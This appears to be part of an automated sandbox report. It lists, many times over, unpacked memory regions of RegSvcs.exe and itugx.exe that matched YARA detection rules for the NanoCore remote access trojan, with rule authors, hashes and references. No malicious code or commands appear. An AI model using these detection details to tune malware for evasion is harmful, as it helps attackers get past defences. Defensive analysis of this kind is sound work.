      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
